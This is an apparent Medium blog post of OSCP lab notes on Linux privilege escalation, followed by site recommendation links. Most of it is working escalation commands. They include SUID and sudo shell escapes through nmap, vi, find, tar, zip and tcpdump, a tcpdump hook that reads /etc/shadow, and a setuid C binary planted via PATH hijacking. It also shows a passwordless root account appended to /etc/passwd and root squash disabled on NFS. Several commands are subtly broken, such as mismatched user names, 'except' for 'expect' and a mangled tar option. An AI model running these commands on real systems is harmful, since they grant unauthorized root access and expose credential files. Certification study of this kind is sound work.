Privilege Escalation on Linux Platform

In this article, I will note and organize some privilege escalation skills used in my OSCP lab. Some are straightforward but fews are tricky. You have to refresh your brain and turn a corner. Before reading it, I highly recommend you to check g0tmi1t’s blog for basic Linux privilege escalation. Here comes the URL: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

\x01 Kernel Exploit

For kernel exploit, you have to identify the kernel version and what distribution you used. You can type the following command to do it, and then search any related exploits on exploit DB, wget it, fix it, compile it and execute it. Here comes the commands to identify the kernel version and your distribution:

$ uname -a
$ cat /etc/issue
$ cat /etc/*-release
$ cat /etc/lsb-release
$ cat /etc/redhat-release
$ lsb_release

In most cases, you can use sendpage and dirtycow both kernel exploits to do privilege escalation. And I would like to list two kernel exploits worth mentioned here.

The first one is udev kernel exploit. You can refer the following Mad Irish’s article.

The second one is regarding ReiserFS xattr vulnerability. If you see any folder mounted with reiserfs file system with xattr attribute set, it’s worth to give it a try. Here comes the reference link:

\x02 Exploit the service running as root

There are 2 cases I encountered in OSCP lab are Samba 2.2.x and MySQL.

For Samba 2.2.x, please check the following link:

For MySQL, if there is mysql daemon running as root, you could utilize UDF (User Define Function) to get root shell.

\x03 Find anything with SUID / SGID permission

Use the following 2 commands:

$ find / -user root -perm -4000 2>/dev/null
$ find / -perm -2000 2>/dev/null

If you find the following command with SUID/SGID permission, perfect, you almost win.

nmap

$ nmap --interactive
nmap> !sh

Another way below (if nmap doesn’t have interactive mode):
($ echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse)
($ sudo nmap --script=/tmp/shell.nse)

vi

$ vi
:!sh

find

$ find / home -exec sh -i \;

python

$ python -c ‘import pty;pty.spawn(“/bin/sh”)’

strace

$ strace -o /dev/null /bin/sh

tcpdump

$ echo $’id\ncat /etc/shadow’ > /tmp/.shell
$ chmod +x /tmp/.shell
$ tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

If you find out one script file with SUID permission, owned by root and executable by others, and this script file will execute some commands. You can play the trick to get root shell. For example here, this script will execute scp command transferring some backup file to somewhere. Add . into $PATH and compile setuid.c, rename the compiled binary to scp and put it under current folder. And then run that script.

$ export PATH=.:$PATH
$ cat setuid.c
#include <stdio.h>
int main(void)
{
setuid(0); setgid(0); seteuid(0); setegid(0); execvp(“/bin/sh”, NULL, NULL);
}
$ mv setuid scp
$ ./script.sh

\x04 Abuse SUDO

Use the following command to show which command have allowed to the current user.

$ sudo -l

And if you find the following command with NOPASSWD and root set in the output. You win again !!!
zip

$ sudo zip /tmp/test.zip /tmp/test -T --unzip-command=”sh -c /bin/bash”

tar

$ sudo tar cf /dev/null testfile --checkpoint=1 — checkpointaction=exec=/bin/bash

strace

$ sudo strace -o/dev/null /bin/bash

tcpdump

$ echo $’id\ncat /etc/shadow’ > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

nmap

$ echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse
$ sudo nmap --script=/tmp/shell.nse

Another way below:
($ sudo nmap --interactive
nmap> !sh)

scp

$ sudo scp -S /path/to/your/script x y

except

$ sudo except spawn sh then sh

nano

$ sudo nano -S /bin/bash

git

$ sudo git help status
: !/bin/bash

gdb/ftp

$ sudo ftp
: !/bin/sh

\x05 Find any writable file owned by root

Please use the following command to find any writable files owned by root. You might be able to see the script file and add the needed command for your privilege escalation.

$ find / -perm -002 -user root -type f -not-path “/proc/*” 2>/dev/null

\x06 Check /etc/passwd if writable

If you see /etc/passwd is writable, the only thing you should do is to echo one line to /etc/passed

$ echo “tseruser::0:0:pawned:/root:/bin/bash” >> /etc/passwd
$ su testuser

\x07 NFS root squashing

According Wikipedia, root squash is a special mapping of the remote superuser (root) identity when using identity authentication (local user is the same as remote user). Under root squash, a client’s uid 0 (root) is mapped to 65534 (nobody). It is primarily a feature of NFS but may be available on other systems as well.

In the scenario which you use showmount to find your target has NFS service up and running and you’re already in via anyway and you find you have the permission to edit /etc/exports as well, for example, you can use sudoedit to edit /etc/exports. You can put no_root_squash to disable root squash. Please see below:

/home/userfolder *(rw,no_root_squash)

And then you can mount this folder with local root and put the copy of /bin/bash into it. After this, try use the exploited normal account to execute this /bin/bash. You will get the heaven !!!

\x08 Useful tools

In the final section, I will introduce 3 useful tools for your PE. These tools can check and enumerate your target, show rich information for your PE on Linux platform.

Hope you enjoy the article and wish you have a wonderful experience on your Linux privilege escalation. If this article helps you in anyway, please don’t hesitate to give me your clap.

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Automatically create folders for clients in Google Drive with Zapier

Learning Ruby on Rails in 2020 as a junior developer

Earmaster Pro 6 Download Mac

Chapter 1 The Art of Stable Team Design

Design Patterns:Facade

Testing Ask Me Anything — Collaboration, Pairing and Mobbing!

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jie Liau

Jie Liau

More from Medium

TryHackMe: Write-Up Linux PrivEsc — Capstone Challenge

[CTF Series #12] Mini Linux Forensics — MUS22

Bypassing perimeter security with VHD files

Update to Log4shell Detection With Falco